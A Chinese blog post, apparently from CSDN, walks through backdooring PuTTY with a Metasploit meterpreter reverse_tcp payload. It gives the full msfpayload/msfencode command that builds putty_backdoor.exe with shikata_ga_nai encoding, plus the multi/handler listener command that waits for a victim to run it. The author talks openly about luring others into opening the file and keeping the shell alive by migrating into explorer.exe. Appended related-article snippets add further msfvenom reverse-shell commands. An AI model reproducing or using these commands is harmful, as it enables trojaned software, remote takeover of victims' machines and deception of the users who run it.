meterpreter的攻击载荷使用

最新推荐文章于 2024-07-12 02:56:00 发布
最新推荐文章于 2024-07-12 02:56:00 发布
阅读量2.8k 收藏 1
点赞数 1
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangxiaohuzi/article/details/18404249
版权

meterpreter号称是metasploit里面最牛逼的模块,今天我就使用了一下,下面记录一下过程。我这次试验的主要目的是,把能用的攻击载荷绑定到Putty程序上,当受攻击者打开Putty程序之后,我再通过命令将木马线程迁移到一个不会关闭的进程上,如explorer.exe.然后我就能保证木马进程持续不衰地为我服务了,至于怎么诱导人打开,还有怎么使用这个进程,这是后话,还需要进行后面命令的处理。我先记录目前完成的步骤。

  1. 首先,载入此次所需要用到的攻击载荷:

    root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp O

在这里,要说明的是,我已经把putty.exe的文件拷入到/root/example_01下了(我这里改名为putty_02.exe,其实都一样)。而且操作也是在此文件夹下执行。


2.下一步就是要将攻击载荷植入这个putty_02.exe文件当中,这样它才能产生作用,在执行命令的同时,需要进行相关设置,以便于在执行之后,能向LHOST机器回传信息:

root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.135 LPORT=80 R | msfencode -t exe -x /root/example_01/putty_02.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5

使用以上命令,设置攻击机为我的主机:192.168.17.135,使用端口为80,然后将植入后的文件生成为putty_backdoor.exe。

可见,执行成功,攻击载荷成功植入putty_backdoor.exe

将这个putty程序拷贝出虚拟机,然后具体怎么让别人使用,那就是后话了。


3.使用msfcli模式打开那个载荷的坚挺进程,等待有人上钩:

root@bt:/pentest/exploits/framework3# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.17.135 LPORT=80 E

此时,如果在某台肉鸡上面有人点击了你的putty程序,就会有如下状况:


4.至此,彻底进入meterpreter状态。可以利用后面的方法进行控制了。例如,输入shell.获取肉鸡控制。


u013498705
关注
专栏目录
《WEB安全渗透测试》(20)payload攻击载荷
午夜安全
08-23 9277
《WEB安全渗透测试》(20)payload攻击载荷 payload称为攻击载荷,主要用于建立目标机与攻击机之间的稳定连接,并返回一个shell,也可以进行程序注入等。(1)singles(独立载荷)独立载荷,可直接植入目标系统并执行相应的程序,如:shell_bind_tcp。(2)stagers(传输器载荷)传输器载荷,用于目标机与攻击机之间建立稳定的网络连接,与stages(传输体载荷)配合攻击。通常该种载荷体积都非常小,可以在漏洞利用后,方便进行注入,这类载荷功能都非常相似...
渗透测试 ( 4 ) --- Meterpreter 命令详解
墨鱼菜鸡
07-11 3913
From:https://blog.csdn.net/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter   MeterpreterMetasploit 框架中的一...
Meterpreter 是一种 Metasploit 攻击负载
最新发布
weixin_40919176的博客
07-12 28
Meterpreter 是一种 Metasploit 攻击负载,它提供了一个交互式 shell,攻击者可以通过该 shell 探索目标机器并执行代码。Meterpreter 使用内存中 DLL 注入进行部署。因此,Meterpreter 完全驻留在内存中,不会将任何内容写入磁盘。Meterpreter 将自身注入受感染的进...
理解攻击载荷
小山岷的专栏
01-10 1万+
攻击载荷(payload)是系统被攻陷后执行的操作。通常攻击载荷附加于漏洞攻击模块之上,随漏洞攻击一起分发。攻击载荷主分别为:singles stagers stagessinglesSingles are payloads that are self-contained and completely standalone. A Single payload can be some
攻击载荷、木马、蠕虫、感染型病毒,你了解多少?
qq_32044265的博客
07-18 1307
恶意程序是指数字世界中带有攻击意图的程序实体,通常可以分为攻击载荷、木马、蠕虫、感染型病毒。除此之外,还有一类最难清除的病毒,业内通常命名为Rootkit、Bootkit。
载荷是什么意思?底层原理是什么?
长风破浪会有时的博客
04-05 1486
在网络安全领域中,载荷通常通过网络传输进行分发,例如在攻击中利用漏洞,将恶意代码注入到目标系统中,然后通过网络连接控制目标系统,完成攻击的目标。此外,攻击者还可以通过恶意附件、恶意链接等方式将载荷传递给用户,从而控制用户的计算机。在防范安全攻击时,通常需要对载荷进行分析和检测。在计算机安全领域中,载荷(Payload)是指利用漏洞或攻击手段所携带的恶意代码或指令,用来实现攻击者的目的的一段数据或程序代码。载荷通常被设计成可以在目标系统上执行的代码,其目的是为了控制受害者系统、窃取数据、破坏系统等。
Metasploit-payload(攻击载荷)
y@n1n的博客
03-05 1294
payload模块的类型:Single、Stager、Stage。 singles(独立载荷) Single是一种完全独立的Payload,而且使用起来就像运行 calc.exe 一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似 netcat 这样的非metasploit处理工具所捕捉到。 stagers(传输器载荷) Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stage.
metasploit学习之路(三) exploit+payload攻击载荷+metepreter(介绍)
Sea_Sand息禅
07-07 2279
一、exploit介绍 exploit是利用漏洞对目标进行攻击的模块,通过信息的手机及漏洞的验证等,使用相应的exploit对目标机进行漏洞攻击。也就是我么常说的漏洞利用exp。 exploit可有主动和被动两种。 主动:利用合适的exploit对目标机进行攻击 被动:类似于钓鱼,等待用户对我们的诱饵链接等进行操作我们才能攻击成功。 二、payload介绍 payload是msf生成的有效载荷,可...
0x04.第四课 Meterpreter的介绍与使用.pdf
06-24
MeterpreterMetasploit框架中的一个重要组成部分,作为攻击载荷使用,在成功利用漏洞后能够为攻击者提供对目标系统的控制通道。这一模块允许攻击者执行一系列操作,如信息收集、权限提升、文件管理等。 #### 二、...
【网络安全meterpreter攻击实战
茗染云华 荆挑赋樱
11-30 1165
【正确】msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f exe > shell.exe。【正确】msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f elf > shell。
Metasploit 载荷(Payloads)使用详解
悦分享
11-23 528
payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。也有人把payloads称为shellcode。Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。
【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 7816
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
5.Metasploit攻击载荷深入理解
weixin_30279751的博客
07-03 916
Metasploit 进阶第三讲 深入理解攻击载荷 01 Nesus介绍、安装及使用 Nessus介绍 Nessus是一款著名的漏洞扫描及分析工具,提供完整的漏洞扫描服务,并随时更新漏洞数据库。 采用B/S模式,服务器端负责执行具体的扫描任务,客户端负责管理配置服务器端,在服务器端还采用plug-in体系,支持客户端加入自定义插件,其运作效能随系统资源而自行调整。 N...
msf攻击载荷生成
我还在的博客
10-06 1695
msf攻击载荷生成器0x00 前言0x01 拓扑结构0x02 过程1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成生成木马过程 0x00 前言 这是我对 msf攻击载荷生成器的学习记录。 0x01 拓扑结构 0x02 过程 1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成生成木马过程 1.1 显示msfpayload命令的使用方法:msfp...
渗透攻防工具篇-后渗透阶段的Meterpreter
qdslg的专栏
07-29 4338
文章作者  zusheng 文章来源  i春秋原创奖励计划 时间        2016年8月23日 14:38:43 前言熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。目录第一节 初识Meterpreter 1.1、什么是Meterpret...
metasploit(MSF)终端命令大全
weixin_30492047的博客
07-03 786
show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的渗透攻击和其他模块。 info 展示出制定渗透攻击或模...
MSF攻击载荷生成
yanyi3271的博客
10-30 1607
1、查看该模块的可用参数 msfvenom -p windows/shell_reverse_tcp --list-options 2、生成攻击载荷 msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -f exe -o payload1.exe 其中: -f 表示输出格式 -o 表示保存payload为一个...
meterpreter详细教程
06-09
MeterpreterMetasploit 框架中最常用的 payload(载荷)之一,它提供了一个强大的交互式 shell,可以用于远程控制受感染的主机。下面是一些关于 Meterpreter 的详细教程: 1. 获取 Meterpreter Shell 在 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值